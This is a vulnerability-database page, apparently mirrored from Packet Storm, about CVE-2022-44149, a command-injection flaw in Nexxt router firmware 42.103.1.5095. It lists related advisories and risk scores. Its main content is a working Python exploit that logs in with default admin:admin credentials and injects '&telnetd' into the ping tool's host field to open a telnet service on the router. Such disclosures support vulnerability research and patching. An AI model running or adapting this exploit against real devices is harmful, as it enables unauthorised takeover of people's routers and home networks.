Nexxt Router Firmware 42.103.1.5095 Remote Code Execution

🗓️ 04 Jan 2023 00:00:00Reported by Yerodin RichardsType

packetstorm🔗 packetstormsecurity.com👁 329 Views

Nexxt Router Firmware 42.103.1.5095 Remote Code Execution (RCE) Vulnerabilit

Reporter	Title	Published	Views	Family All 15
0day.today	Nexxt Router Firmware 42.103.1.5095 Remote Code Execution Exploit	4 Jan 202300:00	–	zdt
0day.today	Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (Authenticated) Exploit	2 Apr 202300:00	–	zdt
Circl	CVE-2022-44149	6 Jan 202320:20	–	circl
CNNVD	Nexxt Router 操作系统命令注入漏洞	4 Jan 202300:00	–	cnnvd
CVE	CVE-2022-44149	6 Jan 202300:00	–	cve
Cvelist	CVE-2022-44149	6 Jan 202300:00	–	cvelist
Exploit DB	Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)	1 Apr 202300:00	–	exploitdb
NVD	CVE-2022-44149	6 Jan 202317:15	–	nvd
OSV	CVE-2022-44149	6 Jan 202317:15	–	osv
Prion	Authentication flaw	6 Jan 202317:15	–	prion

`# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)  
# Date: 19/10/2022  
# Exploit Author: Yerodin Richards  
# Vendor Homepage: https://www.nexxtsolutions.com/  
# Version: 42.103.1.5095  
# Tested on: ARN02304U8  
# CVE : CVE-2022-44149  
  
import requests  
import base64  
  
router_host = "http://192.168.1.1"  
username = "admin"  
password = "admin"  
  
  
def main():  
send_payload("&telnetd")  
print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")  
pass  
  
def gen_header(u, p):  
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")  
  
def send_payload(payload):  
url = router_host+"/goform/sysTools"  
headers = {"Authorization": "Basic {}".format(gen_header(username, password))}  
params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}  
requests.post(url, headers=headers, data=params)  
  
  
if __name__ == '__main__':  
main()  
`

04 Jan 2023 00:00Current

9High risk

Vulners AI Score9

EPSS0.82155